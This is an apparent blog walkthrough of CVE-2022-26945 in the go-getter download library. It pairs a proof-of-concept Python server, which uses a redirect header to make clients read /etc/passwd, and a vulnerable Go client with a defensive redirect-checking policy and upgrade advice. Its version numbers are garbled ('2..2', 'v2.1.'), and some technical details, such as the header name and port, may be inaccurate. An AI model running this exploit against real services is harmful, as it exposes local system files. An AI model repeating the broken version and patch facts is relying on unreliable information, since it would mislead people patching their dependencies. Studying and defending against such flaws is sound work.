CVE-2022-26945 is all about dangerous flaws in go-getter, a popular Golang library used to download files from URLs across various protocols like HTTP, S3, GCS, and even Git repos. This CVE affects versions up to 1.5.11 and 2..2 and allows attackers to:
- Bypass configuration restrictions (such as only allowing certain sources)
These weaknesses happen because of the way go-getter handled custom HTTP response headers. In this guide, I'll walk you through exactly what went wrong, show you code for exploiting the vulnerabilities, then explain what's been fixed and how to stay safe.
What is Go-Getter?
Go-getter makes it easy for tools (like Terraform, Packer) to fetch data from multiple sources and protocols using a single interface, for example:
```go
import "github.com/hashicorp/go-getter"

err := getter.Get(context.Background(), "./localfolder", "http://example.com/archive.zip")
```
This will download the ZIP from the HTTP link into ./localfolder, automatically figuring out what to do.
1. Protocol Switching via Custom Headers
Go-getter trusted the X-Go-Getter-Redirect header set by an HTTP server. If the server responded with this header, go-getter would follow the value as a new URL—including switching protocols, such as from HTTP to FILE, or to an internal address.
Example

1. Go-getter requests http://attacker.com/resource.
2. The server responds with:

```
HTTP/1.1 302 Found
X-Go-Getter-Redirect: file:///etc/passwd
```

3. Go-getter fetches /etc/passwd from local disk and returns it, exposing files if run on a server!
2. Endless Redirect Loops
An attacker can create a header that points back to itself or a chain of URLs, making go-getter loop endlessly, burning up resources.
3. Configuration Bypass
If an app wants to restrict downloads to http only, this can be bypassed. Even if the original URL is http://, the attacker can force go-getter to switch to S3, FILE, or any protocol that go-getter supports.
Malicious Server Code (Python)

```python
from http.server import BaseHTTPRequestHandler, HTTPServer


class ExploitHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(302)
        # Redirect to a file:// URL via the custom header go-getter trusted
        self.send_header('X-Go-Getter-Redirect', 'file:///etc/passwd')
        self.end_headers()


# Bind to loopback only; the Go client below runs on the same machine.
# Port 808 is a privileged port on Unix, so binding it needs the right permissions.
httpd = HTTPServer(('127.0.0.1', 808), ExploitHandler)
print("Malicious HTTP server running on port 808")
httpd.serve_forever()
```
Vulnerable Go-Getter Usage

```go
package main

import (
	"context"
	"fmt"
	"os"

	"github.com/hashicorp/go-getter"
)

func main() {
	// The destination is a local directory; the source is a plain HTTP URL.
	err := getter.Get(context.Background(), "./output", "http://localhost:808/anything")
	if err != nil {
		fmt.Fprintln(os.Stderr, "Download failed:", err)
	}
}
```
If you run this Go code while the Python server is running (on the same machine), it will fetch /etc/passwd and place it in ./output—even though you only gave it an HTTP URL!
Original References
- Hashicorp Security Advisory: https://discuss.hashicorp.com/t/hcsec-2022-17/42564
- GitHub Security Advisory (GHSA-6v5m-c6r3-7mfj): https://github.com/hashicorp/go-getter/security/advisories/GHSA-6v5m-c6r3-7mfj
- CVE details on NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-26945
In the fixed versions, custom headers are checked strictly, and configuration settings are enforced even after a redirect.
Patch diff: the crucial part was this commit, which refactored protocol and source validation after header handling.
What Should You Do?
- Check your dependencies! If you use go-getter via Terraform, Packer, or your own code, make sure you're using v1.6.1 or v2.1. or later.
- If you can't update, never trust input URLs that might be attacker-controlled.
- If you run public services wrapping go-getter, restrict or validate the origin of supplied URLs before downloading.
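As an added example (not the article's code, nor go-getter's own), here is a client-side redirect policy in Go that a wrapper around go-getter could apply to any server-supplied redirect target, such as the X-Go-Getter-Redirect value above, before following it. The type, method and error names (RedirectPolicy, Check, ErrSchemeNotAllowed, ErrNonPublicHost, ErrTooManyHops) are assumptions; the policy rejects protocol switches (including go-getter's getter::url forcing syntax), loopback and private hosts, and any chain longer than MaxHops, which covers the three weaknesses listed above.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"net/url"
	"regexp"
	"strings"
)

var ErrSchemeNotAllowed = errors.New("redirect scheme or getter not in allowlist")
var ErrNonPublicHost = errors.New("redirect host is loopback, private or unspecified")
var ErrTooManyHops = errors.New("redirect hop limit exceeded")
// go-getter's "getter::url" syntax (e.g. "s3::https://...") selects the getter regardless of the URL scheme.
var forcedGetter = regexp.MustCompile(`^([A-Za-z0-9]+)::(.+)$`)
// RedirectPolicy (assumed name) enforces a scheme/getter allowlist, a public-host rule and a hop limit.
type RedirectPolicy struct {
	Allowed       map[string]bool // lower-case schemes that may be followed, e.g. http and https
	MaxHops, hops int
}

// Check returns nil only if target (a redirect header value on the response for origin) may be followed.
func (p *RedirectPolicy) Check(origin, target string) error {
	getter := ""
	if m := forcedGetter.FindStringSubmatch(target); m != nil {
		getter, target = strings.ToLower(m[1]), m[2]
	}
	base, errO := url.Parse(origin)
	ref, errT := url.Parse(target) // relative targets are resolved against origin below
	if errO != nil || errT != nil {
		return fmt.Errorf("unparseable redirect: origin=%v target=%v", errO, errT)
	}
	u := base.ResolveReference(ref)
	if s := strings.ToLower(u.Scheme); !p.Allowed[s] || (getter != "" && getter != s) {
		return ErrSchemeNotAllowed // rejects file://, s3://, "s3::https://...", etc.
	}
	host := strings.ToLower(u.Hostname())
	if ip := net.ParseIP(host); host == "localhost" || (ip != nil && (ip.IsLoopback() || ip.IsPrivate() || ip.IsUnspecified())) {
		return ErrNonPublicHost // the "internal address" case
	}
	if p.hops++; p.hops > p.MaxHops {
		return ErrTooManyHops // a header that points back at itself cannot loop forever
	}
	return nil
}
func main() {
	p := &RedirectPolicy{Allowed: map[string]bool{"http": true, "https": true}, MaxHops: 5}
	fmt.Println(p.Check("http://example.com/resource", "file:///etc/passwd")) // scheme not allowed
}
```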
Conclusion
CVE-2022-26945 shows how trusting HTTP headers, especially custom ones, can let attackers break through “safe” code paths—especially if a library supports many protocols. Always read changelogs for your dependencies and apply security patches quickly.
- If you want to dig in deeper, see the official HashiCorp advisory.
- You can play with the bug safely using the code snippets above.
- Upgrade go-getter now and check any application that calls out to arbitrary or user-supplied URLs!
Timeline
Published on: 05/25/2022 12:15:00 UTC
Last modified on: 08/10/2022 22:25:00 UTC